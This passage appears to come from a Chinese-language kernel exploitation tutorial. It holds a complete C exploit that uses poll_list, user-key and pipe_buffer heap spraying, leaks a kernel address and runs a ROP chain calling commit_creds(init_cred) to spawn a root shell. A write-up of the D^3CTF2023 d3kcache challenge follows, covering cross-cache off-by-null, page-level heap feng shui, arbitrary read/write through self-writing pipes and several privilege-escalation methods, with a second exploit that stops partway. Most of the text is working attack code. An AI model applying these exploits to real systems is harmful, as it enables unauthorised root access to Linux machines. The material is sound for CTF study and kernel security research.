    args->nfds = (size - (size + PAGE_SIZE - 1) / PAGE_SIZE * sizeof(struct poll_list)) / sizeof(struct pollfd) + N_STACK_PPS;
    args->timer = timer;
    pthread_create(&poll_tid[poll_cnt++], 0, alloc_poll_list, args);
}

void wait_poll_start() {
    while (poll_threads != poll_cnt);
}

void join_poll_threads(void (*confuse)(void *), void *confuse_args) {
    for (int i = 0; i < poll_threads; i++) {
        pthread_join(poll_tid[i], NULL);
        if (confuse != NULL) {
            confuse(confuse_args);
        }
    }
    poll_cnt = poll_threads = 0;
}

struct callback_head {
    struct callback_head *next;

    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head
#define __aligned(x)                    __attribute__((__aligned__(x)))
typedef unsigned long long u64;

struct user_key_payload {
    struct rcu_head rcu;        /* RCU destructor */
    unsigned short datalen;    /* length of this data */
    char data[0] __aligned(__alignof__(u64)); /* actual data */
};

#define KEY_NUM 199
int key_id[KEY_NUM];

int key_alloc(int id, void *payload, int payload_len) {
    char description[0x10] = {};
    sprintf(description, "%d", id);
    return key_id[id] = syscall(__NR_add_key, "user", description, payload, payload_len - sizeof(struct user_key_payload), KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int id, void *payload, size_t plen) {
    return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen);
}

int key_read(int id, void *bufer, size_t buflen) {
    return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen);
}

int key_revoke(int id) {
    return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0, 0, 0);
}

int key_unlink(int id) {
    return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING);
}

struct list_head {
    struct list_head *next, *prev;
};
struct tty_file_private {
    struct tty_struct *tty;
    struct file *file;
    struct list_head list;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_bufer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    /*
     * ->confirm() verifies that the data in the pipe bufer is there
     * and that the contents are good. If the pages in the pipe belong
     * to a file system, we may need to wait for IO completion in this
     * hook. Returns 0 for good, or a negative error value in case of
     * error.  If not present all pages are considered good.
     */
    int (*confirm)(struct pipe_inode_info *, struct pipe_bufer *);

    /*
     * When the contents of this pipe bufer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_bufer *);

    /*
     * Attempt to take ownership of the pipe bufer and its contents.
     * ->try_steal() returns %true for success, in which case the contents
     * of the pipe (the buf->page) is locked and now completely owned by the
     * caller. The page may then be transferred to a different mapping, the
     * most often used case is insertion into different file address space
     * cache.
     */
    int (*try_steal)(struct pipe_inode_info *, struct pipe_bufer *);

    /*
     * Get a reference to the pipe bufer.
     */
    int (*get)(struct pipe_inode_info *, struct pipe_bufer *);
};

void get_shell(void) {
    char *args[] = {"/bin/bash", "-i", NULL};
    execve(args[0], args, NULL);
}

#define SEQ_NUM (2048 + 128)
#define TTY_NUM 72
#define PIPE_NUM 1024

int cormon_fd;
char buf[0x20000];

void seq_confuse(void *args) {
    open("/proc/self/stat", O_RDONLY);
}

size_t push_rsi_pop_rsp_ret = 0xFFFFFFFF817AD641;
size_t pop_rdi_ret = 0xffffffff8116926d;
size_t init_cred = 0xFFFFFFFF8245A960;
size_t commit_creds = 0xFFFFFFFF810EBA40;
size_t pop_r14_pop_r15_ret = 0xffffffff81001615;
size_t find_task_by_vpid = 0xFFFFFFFF810E4FC0;
size_t init_fs = 0xFFFFFFFF82589740;
size_t pop_rcx_ret = 0xffffffff8101f5fc;
size_t add_rax_rcx_ret = 0xffffffff8102396f;
size_t mov_mmrax_rbx_pop_rbx_ret = 0xffffffff817e1d6d;
size_t pop_rbx_ret = 0xffffffff811bce34;
size_t swapgs_ret = 0xffffffff81a05418;
size_t iretq = 0xffffffff81c00f97;

int main() {
    bind_core(true, false);
    save_status();
    signal(SIGSEGV, (void *) get_shell);

    cormon_fd = open("/proc_rw/cormon", O_RDWR);
    if (cormon_fd < 0) {
        perror("[-] failed to open cormon.");
        exit(-1);
    }
    size_t kernel_offset;
    int target_key;
    puts("[*] Saturating kmalloc-32 partial slabs...");

    int seq_fd[SEQ_NUM];
    for (int i = 0; i < SEQ_NUM; i++) {
        seq_fd[i] = open("/proc/self/stat", O_RDONLY);
        if (seq_fd[i] < 0) {
            perror("[-] failed to open stat.");
            exit(-1);
        }
        if (i == 2048) {
            puts("[*] Spraying user keys in kmalloc-32...");
            for (int j = 0; j < KEY_NUM; j++) {
                setxattr("/tmp/exp", "sky123", buf, 32, XATTR_CREATE);
                key_alloc(j, buf, 32);
                if (j == 72) {
                    bind_core(false, false);
                    puts("[*] Creating poll threads...");
                    for (int k = 0; k < 14; k++) {
                        create_poll_thread(PAGE_SIZE + sizeof(struct poll_list) + sizeof(struct pollfd), 3000);
                    }
                    bind_core(true, false);
                    wait_poll_start();
                }
            }
            puts("[*] Corrupting poll_list next pointer...");
            write(cormon_fd, buf, PAGE_SIZE);
            puts("[*] Triggering arbitrary free...");
            join_poll_threads(seq_confuse, NULL);
            puts("[*] Overwriting user key size / Spraying seq_operations structures...");
        }
    }
    puts("[*] Leaking kernel pointer...");

    for (int i = 0; i < KEY_NUM; i++) {
        int len = key_read(i, buf, sizeof(buf));
        kernel_offset = search_kernel_offset(buf, len);
        if (kernel_offset != INVALID_KERNEL_OFFSET) {
            qword_dump("dump leak memory", buf, 0x1000);
            target_key = i;
            break;
        }
    }
    if (kernel_offset == INVALID_KERNEL_OFFSET) {
        puts("[-] failed to leak kernel offset,try again.");
        exit(-1);
    }

    push_rsi_pop_rsp_ret += kernel_offset;
    pop_rdi_ret += kernel_offset;
    init_cred += kernel_offset;
    commit_creds += kernel_offset;
    pop_r14_pop_r15_ret += kernel_offset;
    find_task_by_vpid += kernel_offset;
    init_fs += kernel_offset;
    pop_rcx_ret += kernel_offset;
    add_rax_rcx_ret += kernel_offset;
    mov_mmrax_rbx_pop_rbx_ret += kernel_offset;
    pop_rbx_ret += kernel_offset;
    swapgs_ret += kernel_offset;
    iretq += kernel_offset;

    puts("[*] Freeing user keys...");
    for (int i = 0; i < KEY_NUM; i++) {
        if (i != target_key) {
            key_unlink(i);
        }
    }
    sleep(1);

    puts("[*] Spraying tty_file_private / tty_struct structures...");
    int tty_fd[TTY_NUM];
    for (int i = 0; i < TTY_NUM; i++) {
        tty_fd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if (tty_fd[i] < 0) {
            perror("[-] failed to open ptmx");
        }
    }

    puts("[*] Leaking heap pointer...");

    size_t target_object = -1;
    int len = key_read(target_key, buf, sizeof(buf));
    qword_dump("dump leak memory", buf, 0x1000);
    for (int i = 0; i < len; i += 8) {
        struct tty_file_private *head = (void *) &buf[i];
        if (is_dir_mapping_addr((size_t) head->tty) && !(((size_t) head->tty) & 0xFF)
            && head->list.next == head->list.prev && head->list.prev != NULL) {
            qword_dump("leak tty_struct addr from tty_file_private", &buf[i], sizeof(struct tty_file_private));
            target_object = (size_t) head->tty;
            printf("[+] tty_struct addr: %p\n", target_object);
            break;
        }
    }
    if (target_object == -1) {
        puts("[-] failed to leak tty_struct addr.");
        exit(-1);
    }

    puts("[*] Freeing seq_operation structures...");
    for (int i = 2048; i < SEQ_NUM; i++) {
        close(seq_fd[i]);
    }

    bind_core(false, false);

    puts("[*] Creating poll threads...");
    for (int i = 0; i < 192; i++) {
        create_poll_thread(sizeof(struct poll_list) + sizeof(struct pollfd), 3000);
    }

    bind_core(true, false);

    wait_poll_start();

    puts("[*] Freeing corrupted key...");
    key_unlink(target_key);
    sleep(1); // GC key

    puts("[*] Overwriting poll_list next pointer...");
    char key[32] = {};
    *(size_t *) &buf[0] = target_object - 0x18;

    for (int i = 0; i < KEY_NUM; i++) {
        setxattr("/tmp/exp", "sky123", buf, 32, XATTR_CREATE);
        key_alloc(i, key, 32);
    }

    puts("[*] Freeing tty_struct structures...");
    for (int i = 0; i < TTY_NUM; i++) {
        close(tty_fd[i]);
    }

    sleep(1); // GC TTYs
    int pipe_fd[PIPE_NUM][2];
    puts("[*] Spraying pipe_bufer structures...");
    for (int i = 0; i < PIPE_NUM; i++) {
        pipe(pipe_fd[i]);
        write(pipe_fd[i][1], "sky123", 6);
    }

    puts("[*] Triggering arbitrary free...");
    join_poll_threads(NULL, NULL);


    ((struct pipe_bufer *) buf)->ops = (void *) (target_object + 0x300);
    ((struct pipe_buf_operations *) &buf[0x300])->release = (void *) push_rsi_pop_rsp_ret;


    size_t *rop = (size_t *) buf;

    *rop++ = pop_r14_pop_r15_ret;
    rop++;
    rop++; // ops

    // commit_creds(&init_creds)
    *rop++ = pop_rdi_ret;
    *rop++ = init_cred;
    *rop++ = commit_creds;

    // current = find_task_by_vpid(getpid())
    *rop++ = pop_rdi_ret;
    *rop++ = getpid();
    *rop++ = find_task_by_vpid;

    // current->fs = &init_fs
    *rop++ = pop_rcx_ret;
    *rop++ = 0x6e0;
    *rop++ = add_rax_rcx_ret;
    *rop++ = pop_rbx_ret;
    *rop++ = init_fs;
    *rop++ = mov_mmrax_rbx_pop_rbx_ret;
    rop++;

    // back to user
    *rop++ = swapgs_ret;
    *rop++ = iretq;
    *rop++ = (uint64_t) get_shell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    puts("[*] Spraying ROP chain...");
    for (int i = 0; i < 31; i++) {
        key_alloc(i, buf, 1024);
    }

    puts("[*] Hijacking control flow...");
    for (int i = 0; i < PIPE_NUM; i++) {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }

    sleep(-1);

    return 0;
}

例题：D^3CTF2023 d3kcache

附件下载链接

题目驱动使用独立的 kmem_cache ，object 大小为 0x800。

1	kcache_jar = kmem_cache_create_usercopy("kcache_jar", 0x800LL, 0LL, 0x4042000LL, 0LL, 0x800LL, 0LL);

存在 off by null 漏洞。

if ( a2 == 0x514 )                        // write
{
  if ( (unsigned int)input.index <= 0xFuLL && ptr_list[input.index].ptr )
  {
    v7 = input.size;
    if ( input.size > 0x800u || (unsigned int)(input.size + cur_read_len[input.index].len) >= 0x800 )
      v7 = 2048 - cur_read_len[input.index].len;
    if ( v7 < 0 )
      BUG();
    v8 = &ptr_list[input.index].ptr[cur_read_len[input.index].len];
    v9 = (unsigned int)v7;
    v10 = input.buf;
    _check_object_size(v8, (unsigned int)v7, 0LL);
    if ( !copy_from_user(v8, v10, v9) )
    {
      v8[v9] = 0;
      v5 = 0LL;
    }
    goto LABEL_2;
  }
  ...
}

由于 kcache_jar 独立，因此只能考虑页级堆风水。通过调试发现 kcache_jar 的 oo = 196624 因此向 buddy system 请求的内存页的 order 为 196624 >> 16 = 3 。为了提高成功率，溢出修改的结构的所使用的 kmem_cache 的 order 也要为 3 。

这里我们使用 pipe_buffer 作为被修改的对象，为了使得其所使用的 kmem_cache 的 order 为 3 。我们需要调整 pipe 所使用的 pipe_buffer 数组的大小。这里我们使用的 kmem_cache 为 kmalloc-2k ，该 kmem_cache 的 oo 为 196624，对应的 order 为 3 。

pipe_fcntl 传入参数为 $n$ 时最终在 pipe_resize_ring 函数中 kcalloc 申请的内存大小为 $\left \lfloor\frac{2^{\left \lceil \log_2n \right \rceil }}{2^{12}}\right \rfloor \times \text{sizeof(struct pipe\_buffer)}$ ，因此我们只需要传入的参数为 0x1000*64 则会申请 $\left \lfloor\frac{2^{\left \lceil \log_2(\text{0x1000}\times 64) \right \rceil }}{2^{12}}\right \rfloor \times 40=\text{0xa00}$ 大小的内存，即可在 kmalloc-4k 中申请内存（实际调试发现 kmalloc-4k 的 kmem_cache 的 oo 为 196616 ，即 order 为 3，因此和 kmalloc-2k 效果一样，这里当然也可以传入例如 0x1000*32 在 kmalloc-2k 中申请内存。另外具体调试方法可以在 pipe_resize_ring 函数的 kmalloc 中下断点然后往里跟到 _kmem_cache_alloc_node 函数查看使用的 kmem_cache 。）。

通过溢出，我们修改了相邻内存页中的 pipe_buffer ，使其指向另一个 page 结构体。通过读取 pipe_buffer 中的内容我们可以获得 orig_pipe_id[0] 和 victim_pipe_id[0] 。

我们关闭 orig_pipe_id[0] 对应的 pipe，然后调用 pipe_fcntl 重新分配其余的 pipe 的 pipe_buffer 使得存在新的 pipe_buffer 位于 orig_pipe_id[0] 释放的 page 上。为了达到这个效果， pipe_fcntl 传入的参数为 0x1000*(96/sizeof(struct pipe_buffer)) ，这样会在 kmalloc-96 申请 pipe_buffer 内存，该 kmem_cache 的 oo 为 42，对应的 order 为 0 。

通过对 victim_pipe_id[0] 的读取和写入，我们实现了下图所示效果，同时也获取了一个 page 结构体的地址。

再一次采取上面的步骤，构造三个自写管道 evil_pipe_id[0] ，evil_pipe_id[1] 和 evil_pipe_id[2] 。

由于 3 个 pipe 都可以自写，因此可以利用三个 pipe 实现任意地址读写原语。

第一个管道用以进行内存空间中的任意读写，我们通过修改其 page 指针完成。
第二个管道用以修改第三个管道，使其写入的起始位置指向第一个管道
第三个管道用以修改第一个与第二个管道，使得第一个管道的 page 指针指向指定位置、第二个管道的写入起始位置指向第三个管道。

我们目前实现的任意地址读写是在根据 page 结构体地址读取 page 对应内存页的数据。由于 page 数组和线性映射区直接是线性映射的关系，因此我们需要泄露 page_offset_base 和 vmemmap_base 来实现线性映射区地址和 page 结构体地址之间的转换。

page_offset_base + 0x9d000 地址处存放 secondary_startup_64 地址，由于前面读取 pipe_buffer 时通过 ops 泄露了内核基址，因此这个地址我们是知道的。我们可以泄露的 page 地址与上 0xfffffffff0000000 为起始 vmemmap_base 向前遍历，检测 vmemmap_base + 0x9d000 / 0x1000 * sizeof(struct page) 地址处的 page 对应的内存页的起始位置是否存储了 secondary_startup_64 的地址，从而获取到 vmemmap_base 。

之后我们遍历 page 搜索当前进程的 task_struct ，在 task_struct 中有一个 ptraced 链表，在没有进程附加的时候是空链表指向自己，因此我们可以得到 task_struct 的地址，并且这个地址是线性映射区上的地址，进而我们可以得到 page_offset_base 。

至此我们实现了线性映射区的任意地址读写（权限允许的情况下）。

现在我们继续扩展利用范围，在线性映射区的任意地址读写的基础上实现真正的任意地址读写，这就需要我们在已知虚拟地址的基础上获取线性映射区中的地址。

由于前面我们已经泄露了 task_struct 的内容，因此我们可以泄露其中 mm_struct 类型的指针 mm 。从而在 mm_struct 中泄露 pgd 。

有了 pgd 之后我们可以进行页表解析获取任意一个虚拟地址对应的物理地址，也就知道了在线性映射区中的地址。

至此我们实现了真正意义上的任意地址读写。

有了任意地址读写后，提权方法就很多了，这里列举三种方法。

第一种方法是直接修改 task_struct 的 cred 指针指向 init_cred 或者写 task_struct 对应的 cred 。

第二种方法是向内核栈写 rop 提权。通过 task_struct 的 stack 指针我们可以获取到内核栈的地址。之后我们可以向内核中喷射 rop 实现提权。

第三种方法是向内核中的代码段写 shellcode 实现提权。不过由于内核代码段不可写，因此我们需要先 mmap 一块内存，然后修改这块内存对应的页表，将代码段的物理地址写入页表并设置为可读写权限。这里需要注意的是代码段是 2M 而不是 4K 的内存页，因此解析的是 3 级页表而不是 4 级页表。

至于 shellcode，提权代码不容易实现为 shellcode，但我们可以修改 ns_capable_setid 的返回值恒为 1 。在调用 setresuid(0, 0, 0) 提升权限的时候会通过 ns_capable_setid 判断是否允许，在修改 ns_capable_setid 函数后我们可以使用 setresuid(0, 0, 0) 提权。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <asm/ldt.h>
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <semaphore.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/sysinfo.h>

int randint(int min, int max) {
    return min + (rand() % (max - min));
}

void bind_core(bool fixed, bool thread) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(fixed ? 0 : randint(1, get_nprocs()), &cpu_set);
    if (thread) {
        pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set);
    } else {
        sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    }
}

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

void byte_dump(char *desc, void *addr, int len) {
    uint8_t *buf8 = (unsigned char *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len; i += 16) {
        printf("  %04x", i);
        for (int j = 0; j < 16; j++) {
            i + j < len ? printf(" %02x", buf8[i + j]) : printf("   ");
        }
        printf("   ");
        for (int j = 0; j < 16 && j + i < len; j++) {
            printf("%c", isprint(buf8[i + j]) ? buf8[i + j] : '.');
        }
        puts("");
    }
}

bool is_kernel_text_addr(size_t addr) {
    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
//    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

bool is_dir_mapping_addr(size_t addr) {
    return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF;
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

/**
 * @brief create an isolate namespace
 * note that the caller **SHOULD NOT** be used to get the root, but an operator
 * to perform basic exploiting operations in it only
 */
void unshare_setup(void) {
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}
/**
 * III -  pgv pages sprayer related
 * not that we should create two process:
 * - the parent is the one to send cmd and get root
 * - the child creates an isolate userspace by calling unshare_setup(),
 *      receiving cmd from parent and operates it only
 */
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

/* operations type */
enum {
    CMD_ALLOC_PAGE,
    CMD_FREE_PAGE,
    CMD_EXIT,
};

/* tpacket version for setsockopt */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr) {
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        goto err_setsockopt;
    }

    return socket_fd;

    err_setsockopt:
    close(socket_fd);
    err_out:
    return ret;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_ALLOC_PAGE,
            .size = size,
            .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));
    usleep(10000);
    return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void) {
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* create an isolate namespace*/
    unshare_setup();

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        if (req.cmd == CMD_ALLOC_PAGE) {
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
        } else if (req.cmd == CMD_FREE_PAGE) {
            ret = close(socket_fd[req.idx]);
        } else {
            printf("[x] invalid request: %d\n", req.cmd);
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void) {
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);

    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
    }
}

/**
 * IV - config for page-level heap spray and heap fengshui
 */
#define PIPE_SPRAY_NUM 200

#define PGV_1PAGE_SPRAY_NUM 0x20

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/* spray pages in different size for various usages */
void prepare_pgv_pages(void) {
    /**
     * We want a more clear and continuous memory there, which require us to
     * make the noise less in allocating order-3 pages.
     * So we pre-allocate the pages for those noisy objects there.
     */
    puts("[*] spray pgv order-0 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("[*] spray pgv order-2 pages...");
    for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
        if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    /* spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
        /* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
        if (i % 19 == 0) {
            free_page(pgv_4pages_start_idx++);
        }

        /* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
        if (i % 21 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        /* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
        if (i % 512 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("");
}


int kcache_fd;

typedef struct {
    int index;
    uint32_t size;
    void *buf;
} kcache_cmd;


int kcache_alloc(int index, uint32_t size, void *buf) {
    return ioctl(kcache_fd, 0x114, &(kcache_cmd) {index, size, buf});
}

int kcache_write(int index, uint32_t size, void *buf) {
    return ioctl(kcache_fd, 0x514, &(kcache_cmd) {index, size, buf});
}

int kcache_read(int index, uint32_t size, void *buf) {
    return ioctl(kcache_fd, 0x1919, &(kcache_cmd) {index, size, buf});
}

int kcache_free(int index) {
    return ioctl(kcache_fd, 0x810, &(kcache_cmd) {.index=index});
}

#define KCACHE_NUM 0x10
#define KCACHE_SIZE 2048

#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int pipe_fd[PIPE_SPRAY_NUM][2];

struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
} info_pipe_buf, evil_pipe_buf[3];
int orig_pipe_id[2] = {-1, -1};
int victim_pip_id[2] = {-1, -1};
int evil_pipe_id[3] = {-1, -1, -1};
size_t page_offset_base = 0xffff888000000000;
size_t vmemmap_base = 0xffffea0000000000;
size_t kernel_offset;
size_t current_task;
size_t buf[0x1000];

struct page *direct_map_addr_to_page_addr(size_t direct_map_addr) {
    return (struct page *) (vmemmap_base + ((direct_map_addr & (~0xFFF)) - page_offset_base) / 0x1000 * 0x40);
}

ssize_t arbitrary_read_by_pipe(void *page_to_read, void *dst) {
    evil_pipe_buf[0].offset = 0;
    evil_pipe_buf[0].len = 0x1FF8;
    evil_pipe_buf[0].page = page_to_read;

    write(pipe_fd[evil_pipe_id[1]][1], &evil_pipe_buf[2], sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[0], sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], buf, TRD_PIPE_BUF_SZ - sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[1], sizeof(info_pipe_buf));
    return read(pipe_fd[evil_pipe_id[0]][0], dst, 0xFFF);
}

ssize_t arbitrary_write_by_pipe(void *page_to_write, void *src, size_t len) {
    evil_pipe_buf[0].offset = 0;
    evil_pipe_buf[0].len = 0;
    evil_pipe_buf[0].page = page_to_write;

    write(pipe_fd[evil_pipe_id[1]][1], &evil_pipe_buf[2], sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[0], sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], buf, TRD_PIPE_BUF_SZ - sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[1], sizeof(info_pipe_buf));
    return write(pipe_fd[evil_pipe_id[0]][1], src, len);
}

void self_write_pipe_init() {
    prepare_pgv_system();
    prepare_pgv_pages();

    puts("[*] spray pipe_buffer...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (pipe(pipe_fd[i]) < 0) {
            perror("[-] failed to create pipe.");
            exit(-1);
        }
    }

    puts("[*] exetend pipe_buffer...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i % 8 == 0) {
            free_page(pgv_8pages_start_idx++);
        }
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
            perror("[-] failed to extend pipe.");
            exit(-1);
        }
        if (i == PIPE_SPRAY_NUM / 2) {
            puts("[*] spray vulnerable 2k obj...");
            free_page(pgv_8pages_start_idx++);
            for (int j = 0; j < KCACHE_NUM; j++) {
                kcache_alloc(j, 6, "sky123");
            }
            puts("[*] exetend pipe_buffer...");
        }
    }

    puts("[*] allocating pipe pages...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        write(pipe_fd[i][1], "sky123", 6);
        for (int j = 0; j < 8; j++) {
            write(pipe_fd[i][1], &i, sizeof(int));
        }
    }

    puts("[*] trigerring cross-cache off-by-null...");
    memset(buf, 0, sizeof(buf)); // 🤔 why ????
    for (int i = 0; i < KCACHE_NUM; i++) {
        kcache_write(i, KCACHE_SIZE - 6, buf);
    }

    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        int nr;
        read(pipe_fd[i][0], buf, 6);
        read(pipe_fd[i][0], &nr, sizeof(int));
        if (!memcmp(buf, "sky123", 6) && nr != i) {
            orig_pipe_id[0] = nr, victim_pip_id[0] = i;
            printf("[+] find victim: %d, orig: %d.\n", victim_pip_id[0], orig_pipe_id[0]);
        }
    }

    if (orig_pipe_id[0] == -1) {
        puts("[-] failed to corrupt pipe_buffer.");
        exit(-1);
    }

    size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
    write(pipe_fd[victim_pip_id[0]][1], buf, SND_PIPE_BUF_SZ * 2 - 6 - 8 * sizeof(int));

    puts("[*] free original pipe...");
